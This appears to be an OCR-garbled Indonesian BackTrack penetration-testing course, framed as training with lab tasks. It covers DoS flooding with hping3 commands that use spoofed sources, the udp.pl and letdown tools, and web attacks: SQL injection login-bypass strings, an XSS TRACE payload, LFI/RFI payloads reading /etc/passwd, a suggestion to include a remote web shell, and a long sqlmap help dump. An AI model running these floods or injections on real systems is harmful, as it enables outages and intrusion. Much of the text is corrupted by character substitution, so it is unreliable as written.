a&a secara akt.a%B> &a# ke-.&ia# aka# -e#.#$$. 2aket Ack#,<%e&$-e#t @ACKB
se/a$ai /a%asa# .#t.k -e%e#$ka2i 2r,ses 2e-/.ata# k,#eksi.
Teta2i> kare#a a%a-at s.-/er &a%a- 2aket *9> "a#$ &ikiri-ka# ,%eh 2e#"era#$
ti&ak%ah !a%i&> 2aket ACK tidak akan 6erna2 datan1 ke tar1et8 &a# 2,rt "a#$
-e#ja&i tar$et sera#$a# aka# -e#.#$$. hi#$$a <akt. 2e-/.ata# k,#eksi
Nkadalu0arsaN ata. timed6out.
Jika se/.ah 2,rt "a#$ %iste#i#$ terse/.t -e#eri-a /a#"ak 2aket2aket SYN> -aka
2,rt terse/.t aka# -eres2,#s#"a &e#$a# 2aket *9>!A+$ ses.ai &e#$a# j.-%ah
2aket SYN "a#$ &ita-2.#$ &i &a%a- buffer "a#$ &ia%,kasika# ,%eh siste- ,2erasi.
$.). TCP Connection F/ood
(+- +onncection Flood se/e#ar#"a ha-2ir sa-a &e#$a# SYN attack> sera#$a# i#i
-e-a#+aatka# a&a#"a 6ort+6ort TCP "a#$ ter/.ka @ open B 2a&a -esi# tar$et.
$.*. UDP F/ood
(D4 +%,,& attack a&a%ah sa%ah sat. sera#$a# &e#ia%,+ser!ice @D,SB "a#$
-e#$$.#aka# I)ser Datagram -rotocolJ @UDPB.
Attacker aka# -e#$iri- /a#"ak reU.est &ata (D4 2a&a tar$et ke2a&a se%.r.h @
random B 2,rt ter/.ka 2a&a se/.ah ser!er tar$et. Sera#$a# i#i aka# -e-aksa ser!er
k,r/a# -e#$iri-ka# /a#"ak ICP 2aket ke2a&a a%a-at "a#$ -e#$iri-ka# (D4
2aket "a#$ &a%a- j.-%ah /esar terse/.t.
Na-.# attacker s.&ah -e-,&i+ikasi a%a-at @ spoof address B sehi#$$a *CM4 2aket
terse/.t ti&ak -e#$arah terha&a2 -esi# attacker. De#$a# -e#$iri- 2aket (D4
&a%a- j.-%ah /esar > -aka k,-2.terAser!er k,r/a# aka# -e#eri-a setia2 2aket
(D4 terse/.t &a# -e-as.ka##"a &a%a- I0aiting list progressJ Te#t. saja aka#
-e#$ha/iska# memori &a# sumber daya ser!er k,r/a#. Sehi#$$a ser!ice %ai##"a
"a#$ har.s#"a /ekerja ti&ak -e#&a2atka# s.-/er &a"a.
$... IcP F/oodin1 Attack
*CM4 +%,,&> /ias &ise/.t se/a$ai -ing flood ata. *murf attack> a&a%ah sa%ah sat.
je#is sera#$a# De#ia% ,+ Ser!ice attack. De#$a# -,&.s Me#$iri-ka# 4aket *cM4
@ 6in1 B&a%a- j.-%ah "a#$ sa#$at /esar terha&a2 -esi# tar$et &e#$a# t.j.a#
-e-/.at crashing k,#eksi TC4A*4 2a&a 2c tar$et &a# -e#ja&ika# TC4A*4 -e#ja&i
ti&ak %a$i -eres2,# /er/a$ai reU.est TC4A*4 2aket. Sera#$a# "a#$ &ise/.t j.$a
se/a$ai PoD @ ping of death B -a-2. -e#$ha/iska# /a#&<i&th k,-2.ter k,r/a#
%. 'A" TASK
%.$ S:N F'OOD Testin1
S2esi+ikasi 4erc,/aa#
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^XZY
Korban ? =icti5 @
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*4 E A&&ress Q 1:'.169.1.5
)S Q Micr,s,+t =i#&,<s C4_';;0
)2e# 2,rt
4)RT STATE SERV*CE VERS*)N
105Atc2 ,2e# msrpc Microsoft Windows RPC
10:Atc2 ,2e# netbios-ssn
335Atc2 ,2e# microsoft-ds Microsoft Windows XP microsoft-ds
330Atc2 ,2e# ssl
Attacker
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
*4 E A&&ress Q 1:'.169.1.:
)S Q Backtrack V R1
Deskri6tion Task++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
(#t.k task %a/ .ji c,/a 2e#"era#$a# SYN +%,,& > sa"a aka# -e#$$.#aka# 26in19
&a%a- 2e#era2a##"a. Sera#$a# terha&a2 SYN aka# -e#aika# tra+ik -e-,r" &ari
k,r/a#. Berik.t i#i $a-/ar a#a%isa -e-,r" k,r/a# se/e%.- 2e#"era#$a#
M,&.s#"a kita aka# -e-aksa k,r/a# -e#eri-a S:N 6aket &a%a- j.-%ah "a#$
sa#$at /esar.
Den1an 5ode inter=a/ Q
root@bt:~# hping3 -i u1000 -S -p 443 192.168.1.5
Di-a#a >
i @ i#ter!a% B .C 1^&a%a- sat.a# -ikr,&etik ^ 1;;; -ikr,&etik
S @ SYN -,&e B ^ -e#$eset +%a$ SYN
2 ^ 2,rt tar$et
i2 tar$et ^ 192.168.1.5
root@bt:~# hping3 -i u1000 -S -p 135 192.168.1.5
bytes
len=46 ip=192.168.1.5 ttl=128 DF id=31677 sport=135 flags=SA
seq=4 win=64320 rtt=4.6 ms
Sa%ah sat. -,&e k,-2%eks sera#$a# SYN &e#$a# -e#$$.#aka# h2i#$0
root@bt:~# hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 445
--flood 192.168.1.5
bytes
hping in flood mode, no replies will be shown
Di-a#a >
U @ U.iet B ^ U.iet -,&e
# @ #.-eric B ^ ,.t2.t secara #.-erik
a @ s2,,+ a&&ress B ^ A%a-at 2a%s.
S @ SYN -,&e B -e#$eset +%a$ SYN
s @ /ase2,rt B 2,rt &i-a#a attacker aka# -e%a#carka# sera#$a#> secara &e+a.%t
a&a%ah ra#&,-
kee2 @ k B Teta2 -e#$$.#aka# 2,rt 2a&a /ase2,rt @ s B
2 @ &est2,rt B 4,rt sasara# 2a&a -esi# tar$et
+%,,& @ -e#$iri- 2aket sece2at -.#$ki# B
4erhatika# e++ek 2a&a -esi# tar$et. Mesi# tar$et -e#.#j.ka# 2e#aika# source
ter2akai &e#$a# ti/ati/a &a# se%.r.h TC4 k,#eksi ter2aksa ber2enti D 2an1. Da#
akhir#"a ti&ak &a2at -e%ak.ka# k,#eksi ke%.ar. Bahka# -e-/.ka site -e%a%.i
bro0ser 2.# ti&ak /isaO
%.% TCP Connection F/ood Testin1
C,#t,h 2e#$$.#aa# h2i#$ &a%a- 2e#"era#$a# D,S TC4 C,##ecti,# 8%,,&
4e#$$.#aa# &e#$a# *ARF) sca# @ C-as B
root@bt:~# hping3 -q -n -a 10.0.0.1 -SARFU -p 445 --flood
192.168.1.5
HPING 192.168.1.5 (wlan0 192.168.1.5): RSAFU set, 40 headers + 0
data bytes
De#$a# -,&e i#ter!a% Q
root@bt:~# hping3 -q -n -a 10.0.0.1 -SARFU -p 445 -i u1000
192.168.1.5
HPING 192.168.1.5 (wlan0 192.168.1.5): RSAFU set, 40 headers + 0
data bytes
%.9 UDP F/ood Testin1
root@bt:~# hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68
--flood 192.168.1.5
HPING 192.168.1.5 (wlan0 192.168.1.5): udp mode set, 28 headers +
0 data bytes
Ka%i i#i sa"a ha#"a -e#a-/ahka# ,2si ++4d6 2e#$$a#ti ,2si +S @ S:N B -aka h2i#$
aka# -e%a#carka# sera#$a# ses.ai -,&e sera#$a# /er/asis UDP. Maka terja&i
2e#aika# s,.rce $ra+ik secara -e#&a&ak &a%a- siste- tar$et

C,#t,h %ai##"a &a%a- /e#t.k i#ter!a%
hping3 -i u1000 -c 4 -p -2 53 192.168.1.5
HPING 192.168.1.5 (wlan0 192.168.1.5): NO FLAGS are set, 40
win=0 rtt=1.6 ms
win=0 rtt=1.6 ms
win=0 rtt=1.6 ms
win=0 rtt=1.8 ms
%.9.$ UDP.P'
Sa%ah sat. t,,%s .&2 +%,,& attack %ai##"a a&a%ah 4d6.6/ . A#&a &a2at -e#$akses#"a
2a&a &irekt,ri !pentest!misc!udp6pl. (&2.2% a&a%ah t,,%s "a#$ &i /a#$.# &ari /ahasa
2e-,$ra-a# 6er/.
La#$kah%a#$kah#"a
Mas.k &irekt,ri &i-a#a .&2.2% /era&a
cd /pentest/misc/udp-pl/
Set 2er-issi,# a$ar &a2at &iesek.si %a#$s.#$
chmod +x udp.pl
R.##i#$
./udp.pl [ ip-address ] [port] [time]
c,#t,h Q
root@bt:/pentest/misc/udp-pl# perl udp.pl 192.168.1.3 53 1
udp flood odix
%.) ICP 3/ood Testin1
root@bt:~# hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 445 --flood
192.168.1.5
HPING 192.168.1.5 (wlan0 192.168.1.5): icmp mode set, 28 headers
+ 445 data bytes
4erhatika# e+ek k,-2.ter k,r/a# sete%ah sera#$a# terse/.t >
4a&a $a-/ar &i atas > kita &a2at -e#$a-/i% kesi-2.%a# /ah<a I+&- flood attack
-a-2. -e#$ha#c.rka# /a#&<i&th tar$et sehi#$$a 2i#$ -e#ja&i RTO @ reIuest
time out B
9. Too/s /ainn7a
9.$ 'ETDO!N
,etdo0n a&a%ah t,,%s "a#$ -a-2. -e%ak.ka# sera#$a# Do* terha&a2 0eb server
&a# router. Let&,<# te%ah teri#sta%% secara &e+a.%t 2a&a Backtrack. A#&a &a2at
-e#$esek.si %et&,<# jika a#&a /era&a 2a&a &irekt,ri t,,%s terse/.t> "a#$ /era&a
2a&a &irekt,ri I!pentest!stressing!letdo0nJ
root@bt:/pentest/stressing/letdown# ls
argparser.cpp inject.h letdown.h readme
argparser.h inject.o letdown.o scriptengine.cpp
argparser.o letdown Makefile scriptengine.h
inject.cpp letdown.cpp payloads scriptengine.o
S"#ta1 2e#$$.#aa# Q
letdown -d [ip-address target] -s [ source-ip ] -p
[ port target ] [ opsi ]
)2si Q
& &esti#ati,# i2 a&&ress ata. &,-ai# tar$et
2 2,rt t.j.a#
s s,.rce i2 a&&ress
1 s,.rce 2,rt 2erta-a @&e+a.%t 1;'5B
" s,.rce 2,rt terakhir @&e+a.%t 65503B
% -,&e 2er.%a#$a#
i #et<,rk i#ter+ace
t s%ee2 ti-e &a%a- sat.a# -icr,sec,#&s @&e+a.%t 1;;;;B
a Maksi-a% <akt. &a%a- sat.a# &etik .#t.k -e#.#$$. res2,# ti-e,.t
@&e+a.%t 3;B
E1tra ,2ti,#sQ
! !er/,sit" %e!e% @;Û.iet> 1^#,r-a%> '^!er/,seB
+ a.t, set +ire<a%% r.%es .#t.k -e%ak.ka# /%,cki#$
rst 2acket "a#$ &i /.at ,%eh ker#e%
c,#t,hQ + i2ta/%es> + /%ackh,%e @.#t.k +ree/s&B
L s2esia% i#terkasi &e#$a# tar$et
s s"# +%,,&i#$> #, 0<a"ha#&shake
a -e#$iri- 2aket ack#,<%e&$-e#t @2,%ite -,&eB
+ -e#$iri- 2aket +i#a%iHe @i#c%.&e 2,%ite -,&eB
r -e#$iri- 2aket reset @2e#$eceka# terha&a2 +ire<a%% r.%es...B
= .k.ra# je#&e%a .#t.k 2aket2aket ack @e1Q ;<i#&,< attackB
) -e#$akti+ka# +ra$-e#tati,# ack &a# set +ra$-e#t ,++set &e%ta
C 4e#$hit.$a# +ra$-e#tati,# ha#a"a jika ,2si ) &i akti+ka# @&e+a.%t 1B
4 2a"%,a& +i%e @%ihat ti2eti2e 2a"%,a& 2a&a &irekt,ri 2a"%,a&..B
M -.%tista$e 2a"%,a& +i%e
2a"%,a&2a"%,a& "a#$ terse&ia a#tara %ai#
root@bt:/pentest/stressing/letdown/payloads# ls
ftp-multi.py http2.txt http.txt smtp-multi.py
Conto2 6en114naan
Ge#eric attack Q
root@bt:/pentest/stressing/letdown# ./letdown -d
192.168.1.5 -s 192.168.1.9 -p 445
4e#"era#$a# &e#$a# -e#$$.#aka# 2a"%,a&
root@bt:/pentest/stressing/letdown# ./letdown -d
www.indonesianbacktrack.or.id -p 80 -x 80 -y 100 -t 1000
"A" I-
!E" ATTACK PENETRATION
Oleh : #a$es%&aster
$. !E" ATTACK !ITH "ACKTRACK
<e/ attack ata. <e/ a2%icati,# 2e#etrati,# testi#$ se/e#ar#"a -er.2aka# ti#&aka#
ti#&aka# 2e#$.jia# ti#$kat kea-a#a# a2%ikasia2%ikasi "a#$ ter%i/at &i &a%a- se/.ah
-eka#is-e <e/ ser!er. A2%ikasia2%ikasi terse/.t /isa /er.2a /ahasa 2e-,$ra-a#
se2erti 2h2> as2> &ata/ase se2erti -"sU%> 2,st$reSDL &a# a2%ikasia2%ikasi <e/
ser!er > se/.t saja a2ache> t,-cat > &%%.
4e#"era#$a# terha&a2 a2%ikasia2%ikasi terse/.t -e-a#$ /era$a- > sa%ah sat. &i
a#tara#"a a&a%ah -e-a#+aatka# ce%ah ata. ke%e-aha# a2%ikasi "a#$ &i/.at secara
se#$aja -a.2.# ti&ak se#$aja ,%eh &e!e%,2-e#t @ vulnerability B . =e/ attack
2e#etrati,# ti&ak /isa &i a#$$a2 re-eh. Ba#"ak kas.s &i-a#a attacker /erhasi%
-e%ak.ka# privilege escalation sete%ah -e%ak.ka# taha2 exploitation1
=e/ Attack 2e#etrati,# testi#$ sa#$at 2er%. &ia&aka# jika a&a %a"a#a# <e/ 2a&a
s.at. ser!er ata. jari#$a# &ikare#aka# a%asa# &i /a<ah i#i.
a. A2%ikasi <e/ re#ta# terha&a2 sera#$a# i#jeksi "a#$ &a2at membahayakan
kese%.r.ha# ser!er
/. Ber/a$ai ,2e# 2,rt "a#$ &i /.ka ,%eh /er/a$ai a2%ikasi <e/ > -e-.#$ki#ka#
turunnya ata. berhentinya -eka#is-e se%.r.h ser!er.
A&a2.# -et,&e 2e#"era#$a# <e/ attack 2e#etrati,# testi#$ -e%a%.i &.a metode
sta#&art
a. =e/ A2%icati,# 4e#etrati,# Testi#$
/. =e/ Ser!er 4e#etrati,# Testi#$ i#c%.&i#$ 2,rt> ser!ice> &%%
Da# a%.r se/.ah attacker &a%a- -e%ak.ka# aksi#"a a&a%ah
a. "41 testin1 6ara5eter @ manual J scanner B
-e#$etah.i &e#$a# 2asti /.$/.$ @ ce%ah B "a#$ &a2at &i -a#+aatka# ,%eh attacker
/aik &e#$a# e12%,it i#jecti,# ata. -a#.a% i#jecti,#
/. aintainin1 Access
-e#i#$$a%ka# /ack&,,r ata. se/.ah 2r,$ra- "a#$ &a2at -e#ja&i 2i#t. -as.k .#t.k
ke-/a%i &a# -e#$eks2%,re ser!er k,r/a# ka2a# saja
c. C/eannin1
-e-/ersihka# %,$%,$ "a#$ &a2at -e-/eri ketera#$a# te#ta#$ ke$iata# ata.
i#+,r-asi attacker.
$.$. 0enis # ;enis =4/nerabi/it7

$.$.$. SV' in;ection
SDL *#jecti,# seri#$ &i$.#aka# .#t.k -e#"era#$ kea-a#a# &ari sit.s <e/ &e#$a#
-e-as.kka# 2eri#tah SDL &a%a- <e/ .#t.k -e#"era#$ <e/ "a#$ &ira#ca#$ /.r.k
.#t.k -e%ak.ka# 2e#$e%,%aha# &ata/ase @/isa -e-.#c.%ka# isi &ata/ase ke
2e#"era#$B. SDL i#jecti,# a&a%ah tek#ik "a#$ -e-as.ka# k,&e i#jeksi &a%a-
-e#$eks2%,itasi <e/site. Kere#ta#a# terja&i ketika -e#$.#aka# karakter "a#$ .#ik
&a%a- 2eri#tah SDL a$ar %,%,s -e-a#i2.%asi 2eri#tah SDL. 4eri#tah SDL &ari
<e/site ke &ata/ase &e#$a# a2%ikasi @se2erti U.er"B .#t.k -e-,&i+ikasi isi &ata/ase
ata. -e#a-2i%ka# i#+,r-asi &ata/ase se2erti #,-,r kart. kre&it ata. 2ass<,r& ke
2e#"era#$. SDL i#jecti,# &ike#a% se/a$ai sera#$a# .#t.k sit.s <e/> teta2i &a2at
&i$.#aka# .#t.k -e#"era#$ se$a%a je#is a2%ikasi -e#$.#aka# &ata/ase SDL.
$.$.%. -SS
XSS Atau Cross Site Scripting adalah side client attack di mana seorang
penyerang menciptakan link jahat,script yang berisi kode yang kemudian
diexploitasikan dalam browser korban. Kode script bisa bahasa apapun yang
didukung oleh browser, tetapi biasaya adalah HTML dan Javascript yang digunakan
bersama-sama dengan embedded Flash, Java atau ActiveX.
Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan,
serangan pada browser, phishing, propaganda dan bahkan caching! Namun masih
memerlukan korban untuk mengklik link jahat yang sengaja diciptakan oleh
penyerang.
Bagaimana membuat korban untuk mengklik link XSS?
Cara termudah untuk membuat orang meng-klik link berbahaya adalah dengan
rekayasa sosial seperti social engineering dan berbagai tehnik sosial lainnya
Jenis-jenis Cross Site Scripting
Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site
Scripting juga bisa
dipicu melalui cookie.
Perbedaan antara GET,POST pada XSS
Variable GET terjadi dimana attacker mengirimkan crafted URL jahat kepada
korban yang kemudian dijalankan ketika korban membuka link dalam browser.
Variabel POST terjadi dimana attacker menggunakan flash untuk mengirim korban
ke POST-XSS
situs yang rentan , hal ini dikarenakan mustahil untuk membuat URL ketika POST-
variabel sedang digunakan
Sub-kategori dari Cross Site ScriptingPada saat ada XSSR dan XSSQLI.
CSSR alias XSSR atau Cross Site Redirection Script digunakan untuk mengarahkan
korban kepada halaman lain. Halaman bisa misalnya berisi phishing template, kode
serangan browser atau hijacking.
XSSQLI adalah campuran Cross Site Scripting dan SQL Injection
XST dikenal sebagai Cross Site (Script) Tracing adalah suatu cara untuk
menyalahgunakan HTTP Trace (Debug) protokol. Apa pun dikirimkan attacker ke
web-server yang telah diaktifkan akan mengirim TRACE jawaban yang sama
kembali.Misalnya:,
TRACE / HTTP/1.0
Host: target.tld
Custom-header: <script>alert(0)</script>
Maka penyerang akan menerima "Custom-header yang sama. Namun setelah
update browser terbaru tahun berikutnya (s) XST telah semakin sulit untuk berfungsi
dengan benar.
$.$.9. 'FI
L8* @L,ca% 8i%e *#c%.si,#B a&a%ah se/.ah serangan 2a&a <e/site &i -a#a
2e#"era#$ /isa -e#$akses se-.a +i%e &i &a%a- ser!er &e#$a# ha#"a -e%a%.i (RL.
Ke%e-aha# i#i terja&i kare#a a&a#"a /e/era2a +.#$si 2h2 &a# /e/era2a -,&.% 2a&a
<e/ ser!er.
Be/era2a +.#$si 2h2 2e-ic. L8* !.%#era/i%it"
Be/era2a +.#$si 2h2 "a#$ -e-.#$ki#ka# terja&i#"a I/.$J ata. !.%#era/i%it"
terha&a2 je#is sera#$a# i#i a&a%ah
include();
include_once();
require();
require_once();
4erhatika# c,#t,h &i /a<ah i#i >
<?php
include ../$_GET[imagefile];
?>
C,&e &iatas -e#$$.#aka# +.#$si i#c%.&e &e#$a# as.-si
$imagefile=image.php> -aka &a2at &i2astika# (RL .#t.k -e#$akses
ha%a-a# terse/.t aka# -e#ja&i
http://www.[target.com/inde!.php"imagefile#image.php
-aka scri2t terse/.t aka# -e#a-2i%ka# ha%a-a# i-a$e.2h2. Disi#i attacker
&i-.#$i#ka# -e%ak.ka# L8* kare#a !aria/%e i-a$e+i%e &i i#c%.&e ta#2a
-e#$$.#aka# +i%ter.
Jika attacker i#$i# -e#$akses +i%e 2ass<& "a#$ a&a 2a&a ser!er> -aka attacker &a2at
-e%ak.ka# akses ke &a%a- ser!er &e#$a# -e#e#t.ka# ke&a%a-a# &irekt,ri.
Me#$i#$at +i%e 2ass<& /era&a 2a&a &irekt,ri AetcA2ass<& -aka attacker -e#c,/a
ke&a%a-a# &irekt,ri &a# -e#$akses#"a -e%a%.i <e/ /r,<ser.
../../../../../../../../../etc/passwd
&e#$a# as.-si /ah<a j.-%ah I..DJ it. ter$a#t.#$ &ari ke&a%a-a# &irekt,ri te-2at
+i%e i#&e1.2h2 terse/.t.. &e#$a# /e$it. isi +i%e 2ass<& aka# &ita-2i%ka# &i /r,<ser.
"ebera6a 5od4/ ser=er 6e5ic4 'FI =4/nerabi/it7
allow_url_include = on
allow_url_fopen = on
magic_quotes_gpc = off
Terka&a#$ aka# ter&a2at err,r &isaat 2ass<& ti&ak &a2at &i akses kare#a 2er-i#taa#
ekste#si "a#$ ti&a ses.ai 2a&a scri2t.
!arnin1C 5ain?..D..D..D..D..D..D..D..D..DetcD6asswd.626@ G34nction.5ainHC 3ai/ed to o6en
strea5C No s4c2 3i/e or director7 in Dt2eirDwebDrootDinde<.626 on /ine %
Kare#a it. attacker aka# -e-a#i2.%asi scri2t &e#$a# -e-a#+aatka# -,&.%
I-a$icFU.,tesF$2c ^ ,++J sehi#$$a attacker -e-as.ka# P;; @ #.%% i#jecti,# B
.#t.k -e#$hi%a#$ka# karakter sete%ah 2ass<&
http://www.[target].com/index.php?
imagefile=../../../../../../../../../etc/passwd%00
Conto2 'FI in;ection
Akses%ah .r% !.r%# L8* 2a&a %a/ @ htt2QAAr,/,t.i#&,#esia#/acktrack.,r.i&AK
+i%e^%s.t1t B ke-.&ia# %ak.ka# i#jeksi se2erti 2a&a ketera#$a# &i atas.
$.$.). RFI
R8* @Re-,te 8i%e *#c%.si,#B a&a%ah se/.ah sera#$a# &i-a#a <e/site -e#$iHi#ka#
attacker -e#$i#c%.&eka# +i%e &ari %.ar ser!er. Met,&e sera#$a# i#i i&e#tik &e#$a#
L8* > ha#"a 2er/e&aa##"a a&a%ah jika L8* -e#$iji#ka# attacker .#t.k -e#$akses
+i%e "a#$ /era&a &a%a- ser!er tar$et -aka R8* a&a%ah -e-as.kka# +i%e &ari %.ar
ser!er tar$et.
Conto2 RFI Ine;ction
Akses%ah .r% !.r%# L8* 2a&a %a/ @ htt2QAAr,/,t.i#&,#esia#/acktrack.,r.i&AK
+i%e^htt2QAAr,/,t.i#&,#esia#/acktrack.,r.i&A%s.t1t B ke-.&ia# %ak.ka# i#jeksi se2erti
2a&a ketera#$a# &i atas. Sa"a -e#c,/a -e#$i#c%.&eka# +i%e &ari %.ar ser!er.
C,/a%ah -e-as.ka# i#c%.&e !aria/e% &e#$a# .r% 4H4 <e/ she%% &ari %.ar ser!er
tar$et.
%. 'A" TASK
(#t.k -e%ak.ka# <e/ 2e#etrati,# -aka trai#i#$ ka-i te%ah -e#"e&iaka# %a/
kh.s.s "a#$ &a2at a#&a akses 2a&a Ihtt2QAAr,/,t.i#&,#esia#/acktrack.,r.i&J
%.$. I56/e5entasi SV' In;ection
%.$.$. SV' In;ection 'o1in For5
Ha%a-a# L,$i# 2a&a s.at. <e/ a2%ikasi -e-i%iki ke-.#$ki#a# !.%#era/i%it".
Attacker aka# -e-as.kka# U or UUQUU or U$UQU$ 2a&a .ser#a-e &a# 2ass<,r& .#t.k
-e-/"2ass
Sehi#$$a terja&i -a#i2.%asi se2erti 2e#je%asa# 2a&a $a-/ar &i /a<ah i#i.
Hasi%#"a a&a%ah attacker /erhasi% %,$i# secara i%e$a% -e%a%.i +,r- terse/.t> &e#$a#
-e-a#+aatka# -a#i2.%asi se2erti &ije%aska# &i atas.
%.%.%. SV' in;ection UR' ? SV'5a6 @
SU%-a2 a&a%ah a2%ikasi /er/asis c,--a#& %i#e @ c%i B "a#$ te%ah terse&ia 2a&a
/acktrack. SDL-a2 &i /a#$.# &ari /ahasa 2e-,$ra-a# 2"th,#. (#t.k -e#$akses
SDL-a2 a#&a &a2at -e#$akses#"a 2a&a -e#. #a$a ata. 2a&a ter-i#a%.
(#t.k -e#$akses sU%-a2 > kita -as.k 2a&a &irekt,ri
root@eichel:~# cd /pentest/database/sqlmap/
root@eichel:/pentest/database/sqlmap# ls
doc extra lib plugins procs shell sqlmap.conf
_sqlmap.py sqlmap.py tamper txt udf xml
Ke-.&ia# .#t.k -e%ihat ,2si,2si "a#$ /er%ak. 2a&a SDL-a2
root@eichel:/pentest/database/sqlmap# ./sqlmap.py --help
sqlmap/1.0-dev (r4766) - automatic SQL injection and
database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets
without prior mutual consent is illegal. It is the end user's
responsibility to obey all applicable local, state and federal
laws. Authors assume no liability and are not responsible for
any misuse or damage caused by this program
[*] starting at 14:09:18
Usage: python ./sqlmap.py [options]
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be specified to set the
source to
get target urls from
-d DIRECT Direct connection to the database
-u URL, --url=URL Target url
-l LOGFILE Parse targets from Burp or WebScarab
proxy logs
-m BULKFILE Scan multiple targets enlisted in a
given textual file
-r REQUESTFILE Load HTTP request from a file
-g GOOGLEDORK Process Google dork results as target
urls
-c CONFIGFILE Load options from a configuration INI
file
Request:
These options can be used to specify how to connect to the
target url
--data=DATA Data string to be sent through POST
--param-del=PDEL Character used for splitting parameter
values
--cookie=COOKIE HTTP Cookie header
--cookie-urlencode URL Encode generated cookie injections
--drop-set-cookie Ignore Set-Cookie header from response
--user-agent=AGENT HTTP User-Agent header
--random-agent Use randomly selected HTTP User-Agent
header
--randomize=RPARAM Randomly change value for given
parameter(s)
--force-ssl Force usage of SSL/HTTPS requests
--host=HOST HTTP Host header
--referer=REFERER HTTP Referer header
--headers=HEADERS Extra headers (e.g. "Accept-Language:
fr\nETag: 123")
--auth-type=ATYPE HTTP authentication type (Basic, Digest
or NTLM)
--auth-cred=ACRED HTTP authentication credentials
(name:password)
--auth-cert=ACERT HTTP authentication certificate
(key_file,cert_file)
--proxy=PROXY Use a HTTP proxy to connect to the
target url
--proxy-cred=PCRED HTTP proxy authentication credentials
(name:password)
--ignore-proxy Ignore system default HTTP proxy
--delay=DELAY Delay in seconds between each HTTP
request
--timeout=TIMEOUT Seconds to wait before timeout
connection (default 30)
--retries=RETRIES Retries when the connection timeouts
(default 3)
--scope=SCOPE Regexp to filter targets from provided
proxy log
--safe-url=SAFURL Url address to visit frequently during
testing
--safe-freq=SAFREQ Test requests between two visits to a
given safe url
--eval=EVALCODE Evaluate provided Python code before the
request (e.g.
"import
hashlib;id2=hashlib.md5(id).hexdigest()")
Optimization:
These options can be used to optimize the performance of
sqlmap
-o Turn on all optimization switches
--predict-output Predict common queries output
--keep-alive Use persistent HTTP(s) connections
--null-connection Retrieve page length without actual
HTTP response body
--threads=THREADS Max number of concurrent HTTP(s)
requests (default 1)
Injection:
These options can be used to specify which parameters to
test for,
provide custom injection payloads and optional tampering
scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to
this value
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--logic-negative Use logic operation(s) instead of
negating values
--skip=SKIP Skip testing for given parameter(s)
--tamper=TAMPER Use given script(s) for tampering
injection data
Detection:
These options can be used to specify how to parse and
compare page
content from HTTP responses when using blind SQL injection
technique
--level=LEVEL Level of tests to perform (1-5, default
1)
--risk=RISK Risk of tests to perform (0-3, default
1)
--string=STRING String to match in the response when
query is valid
--regexp=REGEXP Regexp to match in the response when
query is valid
--code=CODE HTTP response code to match when the
query is valid
--text-only Compare pages based only on the textual
content
--titles Compare pages based only on their
titles
Techniques:
These options can be used to tweak testing of specific SQL
injection
techniques
--technique=TECH SQL injection techniques to test for
(default "BEUST")
--time-sec=TIMESEC Seconds to delay the DBMS response
(default 5)
--union-cols=UCOLS Range of columns to test for UNION query
SQL injection
--union-char=UCHAR Character to use for bruteforcing number
of columns
Fingerprint:
-f, --fingerprint Perform an extensive DBMS version
fingerprint
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained
in the
tables. Moreover you can run your own SQL statements
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--count Retrieve number of entries for table(s)
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or
database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when
enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to
retrieve
--last=LASTCHAR Last query output word character to
retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell
Brute force:
These options can be used to run brute force checks
--common-tables Check existence of common tables
--common-columns Check existence of common columns
User-defined function injection:
These options can be used to create custom user-defined
functions
--udf-inject Inject custom user-defined functions
--shared-lib=SHLIB Local path of the shared library
File system access:
These options can be used to access the back-end database
management
system underlying file system
--file-read=RFILE Read a file from the back-end DBMS file
system
--file-write=WFILE Write a local file on the back-end DBMS
file system
--file-dest=DFILE Back-end DBMS absolute filepath to write
to
Operating system access:
management
system underlying operating system
--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating
system shell
--os-pwn Prompt for an out-of-band shell,
meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell,
meterpreter or VNC
--os-bof Stored procedure buffer overflow
exploitation
--priv-esc Database process' user privilege
escalation
--msf-path=MSFPATH Local path where Metasploit Framework is
installed
--tmp-path=TMPPATH Remote absolute path of temporary files
directory
Windows registry access:
management
system Windows registry
--reg-read Read a Windows registry key value
--reg-add Write a Windows registry key value data
--reg-del Delete a Windows registry key value
--reg-key=REGKEY Windows registry key
--reg-value=REGVAL Windows registry key value
--reg-data=REGDATA Windows registry key value data
--reg-type=REGTYPE Windows registry key value type
General:
These options can be used to set some general working
parameters
-s SESSIONFILE Save and resume all data retrieved on a
session file
-t TRAFFICFILE Log all HTTP traffic into a textual file
--batch Never ask for user input, use the
default behaviour
--charset=CHARSET Force character encoding used for data
retrieval
--check-tor Check to see if Tor is used properly
